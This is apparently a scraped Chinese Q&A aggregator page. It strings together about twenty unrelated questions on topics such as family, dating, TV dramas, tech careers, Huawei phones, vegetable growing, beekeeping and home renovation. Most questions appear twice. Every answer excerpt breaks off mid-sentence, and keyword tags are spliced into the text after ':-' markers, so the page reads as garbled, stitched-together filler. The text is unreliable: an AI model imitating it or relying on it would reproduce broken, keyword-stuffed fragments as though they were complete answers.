上有老 魔咒:上有老下有小,我們真的跳不出這個人生循環了嗎? 的確如此,儘管現在不結婚,晚婚的人很多,但是從人類繁洐生息的歷史和大多數人來看,成家立業,生兒育女,家庭仍是主流,一個人的生理,心理和生存需求決定了生存狀態,生兒育女,瞻養父母即是義務責任,也是生活動:-下有小

如果外面正在下小雨,你會突然想起了誰?

如果外面正在下小雨,你會突然想起了誰?

想起:如果外面正在下小雨,你會突然想起了誰? 我最不忘,還是秋日的雨夜,天又涼了幾分,已經需要披上一件薄薄的外套了。臨窗而望,眼見窗臺上的幾株小植物,葉片上沾了幾滴小雨珠,我總喜歡,用小手電去照它們,這樣的小水滴看起來晶瑩晶瑩的,有一種清清涼涼的:-小雨

初中同學許久未見大學期間突然聯繫請吃飯,態度還良好,我給推了,會不會讓人很煩?

初中同學許久未見大學期間突然聯繫請吃飯,態度還良好,我給推了,會不會讓人很煩?

初中 同學:初中同學許久未見大學期間突然聯繫請吃飯,態度還良好,我給推了,會不會讓人很煩? 吃飯 許久未見,意思就是交情不怎麼樣,無功不受祿,人家憑什麼那麼熱情,難道真的是多年一來忘不了咱們之間的同學情誼,倍感想念了嗎,不是請幫忙、做業務、就是借錢,十有八九十借錢。我建議還是不要去的好,大家都很忙:-許久未見

現在我覺得認真對某個人說我喜歡你什麼的這種話好惡心,我愛你更說不出口,好惡心,是什麼心理?

現在我覺得認真對某個人說我喜歡你什麼的這種話好惡心,我愛你更說不出口,好惡心,是什麼心理?

出口 心理:現在我覺得認真對某個人說我喜歡你什麼的這種話好惡心,我愛你更說不出口,好惡心,是什麼心理? 愛你 更多的是心裡問題,可能對方還沒有優秀到你滿意的程度,更沒有到那種離不開的地步!愛情最終還是要回歸生活,而生活離不開兩個人的相處,父母終究會老,孩子終究會飛,所以選擇自己的伴侶尤為重要,你現在覺得噁心更:-喜歡你

劇版的《何以笙簫默》和《再見王瀝川》哪一個更好看呢?

劇版的《何以笙簫默》和《再見王瀝川》哪一個更好看呢?

再見王瀝川 好看:劇版的《何以笙簫默》和《再見王瀝川》哪一個更好看呢? 《遇見王瀝川》吧,高以翔的王瀝川太招人稀罕了。長相,身材,家世,人品,才能樣樣好,簡直完美,挑不出任何毛病,實在要說一個缺點的話,那就是太tm完美,天妒英才、才讓他飽受病魔折磨。偶像劇、深情帥氣的男主:-何以笙簫默

計算機專業本科能夠進入字節跳動、華為這些公司做開發嗎?是否還需要繼續讀研?

計算機專業本科能夠進入字節跳動、華為這些公司做開發嗎?是否還需要繼續讀研?

學歷是求職必備條件。有了工作不能停止對知識的探索。更高的學歷,可以讓你有更專業的技術能力和學習能力,可以讓你拓展自己的交際圈,可以讓你更知名。總之,活到老,學到老,學習對人總是有好處的,技多不壓身嘛!:-字節 跳動:計算機專業本科能夠進入字節跳動、華為這些公司做開發嗎?是否還需要繼續讀研? 讀研 計算機專業

生完二胎的你們,現在有什麼感想?

生完二胎的你們,現在有什麼感想?

二胎家庭日常是什麼樣的?是不是覺得家裡多了一個小人兒,溫馨多了?不存在的!生二胎根本是媽媽們的渡劫磨礪!以前週末睡到自然醒,現在全年無休,時刻警醒著,能睡一次懶覺跟過年似的,黑眼圈不說,頭髮呼啦啦地掉:-生完 二胎 感想:生完二胎的你們,現在有什麼感想?

華北適合種植蠶豆嗎?

華北適合種植蠶豆嗎?

華北適合種植蠶豆,種蠶豆的面積大,在西北,華北,都在種植蠶豆,蠶豆莖稈根部有根瘤菌是種植其它農作物的好茬地,特別是土壤培養和防病蟲害起到作用。:-蠶豆 種植 適合:華北適合種植蠶豆嗎? 華北

華為手機更新EMUI10.1系統後效果咋樣?

華為手機更新EMUI10.1系統後效果咋樣?

大家知道現在智能手機的性能不僅僅跟智能手機的硬件有關,還跟智能手機的系統軟件息息相關,在國產智能手機操作系統裡,小米的MIUI系統跟華為的EMUI系統都是比較優秀的操作系統。最近小米推出了小米MIUI:-咋樣 華為 華為手機 更新:華為手機更新EMUI10.1系統後效果咋樣?

大熱天蜜蜂老是爬到箱外結群正常嗎?

大熱天蜜蜂老是爬到箱外結群正常嗎?

蜜蜂 爬到:大熱天蜜蜂老是爬到箱外結群正常嗎? 盜蜂現在正是夏季,很多地方蜜源稀少,蜂群中可能缺蜜,也是胡蜂猖獗的時間,所以蜂群中是非常容易發生盜蜂的。在蜂群中發生盜蜂的時候,蜂群守衛蜂會增多,但是這種情況引發的蜜蜂在蜂箱外一般不會結團,只是蜜蜂來:-大熱天

辣椒正是生長最佳期,偏偏有的辣椒苗蔫,不是病蟲害是咋回事?

辣椒正是生長最佳期,偏偏有的辣椒苗蔫,不是病蟲害是咋回事?

最佳期 霧都山客來回答您的問題。最近山客家鄉的村民正在進行辣椒移栽,確實有像題主提到的情形,辣椒苗移栽前長勢蔥蔥,嫩綠喜人,但是移栽後幾天內就出現萎蔫現象,細心觀察也不是被病蟲害危害。那究竟是什麼原因導致辣椒:-苗蔫 辣椒 咋回事:辣椒正是生長最佳期,偏偏有的辣椒苗蔫,不是病蟲害是咋回事?

手機相機發展的最終形態會是怎樣的?

手機相機發展的最終形態會是怎樣的?

最近這幾年手機在電子產品行業裡可謂是發展速度非常快,蘋果和華為兩大公司可以說也是,明爭暗鬥,產品一次比一次有賣點,前一段時間華為和蘋果還都推出了手機新品,兩家都在大力宣傳強調著拍照功能,像iPhone:-形態 相機 手機 最終:手機相機發展的最終形態會是怎樣的?

華為為什麼不出一款5寸全面屏手機呢?我想應該會有很多人支持吧?

華為為什麼不出一款5寸全面屏手機呢?我想應該會有很多人支持吧?

5寸 手機 支持:華為為什麼不出一款5寸全面屏手機呢?我想應該會有很多人支持吧? 很高興回答你的問題,刷頭條刷出來的問題,看到很多人回答,感覺還有一些觀點沒有寫出,所以我來回答一下。首先,華為為什麼不出小尺寸全面屏手機?其實並不只有華為一家沒有出小屏手機,放眼近期各大手機廠商發佈的:-華為

生吃山芋,生吃胡蘿蔔,還有哪些蔬菜可以生吃呢?

生吃山芋,生吃胡蘿蔔,還有哪些蔬菜可以生吃呢?

胡蘿蔔 蔬菜:生吃山芋,生吃胡蘿蔔,還有哪些蔬菜可以生吃呢? 第一種,黃瓜。這個瓜,可不是菜市場中堆放滿滿的青瓜。各位可要睜大眼睛看清楚了,這個黃瓜,青中帶黃,品種屬以前鄉下農戶少量種植的,形態上面來看這種瓜矮、短、圓,表面覆蓋有比較淡的細毛,經水輕輕沖洗之後整:-山芋

為什麼馬鈴薯不宜過早過遲播種?

為什麼馬鈴薯不宜過早過遲播種?

不宜:為什麼馬鈴薯不宜過早過遲播種? 播種 過早 為什麼馬鈴薯不宜過早過遲播種?馬鈴薯的種植主要是由於氣候條件的限制,過早出苗後容易遇到低溫被凍死,種植晚了容易遇到乾旱和高溫,影響產量。馬鈴薯種植時間的早晚必須根據種植地方的氣候條件來確定。馬鈴薯生長:-馬鈴薯

疫情愈發嚴重,原油為何反而大漲?

原油 愈發:疫情愈發嚴重,原油為何反而大漲? 疫情愈發嚴重和原油大漲沒有必然關係。但是資金總是從高處流向低處,原油價格跌的越多,投資價值越明顯,相對於其他產業更有投資價值。舉個例子:深圳南山房價均價大約6萬左右,寶安均價5萬左右,如果南山房價漲到:-疫情

生菜球很好吃,怎麼種植才能高產呢?

生菜球很好吃,怎麼種植才能高產呢?

種植:生菜球很好吃,怎麼種植才能高產呢? 高產 對環境條件的要求、1.溫度生菜球為喜冷涼、忌高溫作物,種子在4度以上可發芽、以15~20度為發芽適溫。幼苗能耐較低溫度,日平均溫度12度時生長壯健,葉球生長最適溫度為13~16度。不過目前有些結球生菜:-生菜

裝修高手來幫忙看下144平,套內122平,怎麼三房改四房? ?

裝修高手來幫忙看下144平,套內122平,怎麼三房改四房? ?

看下 這個戶型三房改四房,改一個小房間,應該沒有問題。△原戶型圖這個戶型改四房,能改的方案比較多,但是修改以後是否好用,是一件值得考慮的事情。一、主臥室變為兩個臥室可以將主臥室改為兩個臥室,但是這樣的改動佔:-房改 122:裝修高手來幫忙看下144平,套內122平,怎麼三房改四房? ? 144

大家幫忙看看這個房子如果要砸牆的話,怎麼改比較好?

大家幫忙看看這個房子如果要砸牆的話,怎麼改比較好?

房子:大家幫忙看看這個房子如果要砸牆的話,怎麼改比較好? 這個戶型砸牆,當然可以砸牆,但是在砸牆之前,要搞清楚為什麼要砸牆,砸牆以後有什麼優劣。△原戶型原戶型圖上的白色牆體部分不是承重牆,理論上說否可以砸掉。但是外牆和與旁邊戶型或者是公共區域的共用牆體和圖上:-幫忙

意蜂夏季喝什麼水降溫?

意蜂夏季喝什麼水降溫?

降溫 意蜂夏季喝什麼水降溫?氣溫高,蜂巢溫度高的情況下,蜜蜂是通過採水的辦法掛在蜂箱的四壁來蒸發帶走熱量,降低蜂巢溫度 同時也能幫助蜂群維持正常的溼度。在平常的情況下,蜜蜂是在室外採自然水的。夏季消耗的水量:-意蜂 夏季:意蜂夏季喝什麼水降溫?

黃瓜種子催芽後種植需要打底水嗎?

黃瓜種子催芽後種植需要打底水嗎?

黃瓜種子:黃瓜種子催芽後種植需要打底水嗎? 你好很高興回答這個問題。答案:不用。1-2天可出芽。黃瓜種子催芽:選用飽滿的種子,用30℃水浸泡4小時後催芽。也可用100倍福爾馬林溶液浸泡種子10-20分鐘,洗淨後清水浸種3-4小時,然後於25-3:-催芽 黃瓜 打底

書友們展示一下自我感覺發揮較好的作品,一起學習?

書友們展示一下自我感覺發揮較好的作品,一起學習?

自我 較好 這幅作品是參賽的,色彩的搭配,紙張的拼接都是自己設計完成的,一如既往的清新淡雅感覺。書體用的魏碑中楷書,增加了書寫的趣味性。:-書友 展示:書友們展示一下自我感覺發揮較好的作品,一起學習?